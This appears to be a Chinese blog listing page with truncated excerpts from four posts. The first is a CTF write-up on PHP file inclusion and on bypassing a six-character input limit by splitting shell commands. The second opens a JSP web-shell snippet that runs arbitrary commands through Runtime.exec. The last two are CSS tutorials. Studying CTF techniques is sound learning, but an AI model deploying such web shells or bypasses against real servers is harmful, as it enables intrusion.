qq_28429161的博客

给看一下环境代码：很简单的一个文件包含，看一下PHP中支持的伪协议的函数：include、require、include_once、require_once、highlight_file，show_source 、readfile 、file_get_contents 、fopen 、file……可以看出这函数在写的时候都可以通过输入相关的一些路径执行操作，我们常见的伪协议有：file:// 访问本地文件系统http:// 访问 HTTP(s) 网址ftp:// 访问 FTP(s) URL

首先审计一下代码当时在写环境的时候我把if语句里面打成了strlen($_GET[1]<7)，然后测试了半天，一搞就是卧槽怎么能正常输出？！！！把代码给群里的水友看了一下卧槽写错了，汗- -。这道题将可以输入的字符控制在了6位，所以在我们正常输入的时候一次性无法使用一长串代码去查看flag文件。通过一段简短的代码可以看出flag文件就在网站根目录的上一层，现在要像个办法突破可控。不行……但是在学过linux命令的小伙伴都晓得，linux命令是可以使用"\"拼接的，所以试试这个方法为

<% @ page language = "java" import = "java.util.*,java.io.*" pageEncoding = "UTF-8"%>< % !public static String excuteCmd(String c){ StringBuilder line = new StringBuilder(); try { Process pro = Runtime.getRuntime().exec(c); BufferedReader

分享一个HTML中的布局样式代码：<!DOCTYPE html><html> <head> <title>CSS自适应布局</title> <style> :root{ --topHeight:60px; --leftBox:300px } .topbar

前言在CSS文档中有时候会多出用到重复的值，使得在前端开发的时候变得繁杂，如果在做一个大型的项目来说，这不得累死。所以css此文档简单写出有关声明自定义属性，使用自定义属性，简单来说，这种效果和常用编程语言来说是差不多的正文自定义属性是一种css变量，使用过自定义属性之后可以供整个文档使用这个定义的值。用法在CSS中声明一个自定义属性由"–"(两个减号)开始.div{ --color:#FF0000; background:var(--color);}在以上例子中我们使用- -开始定义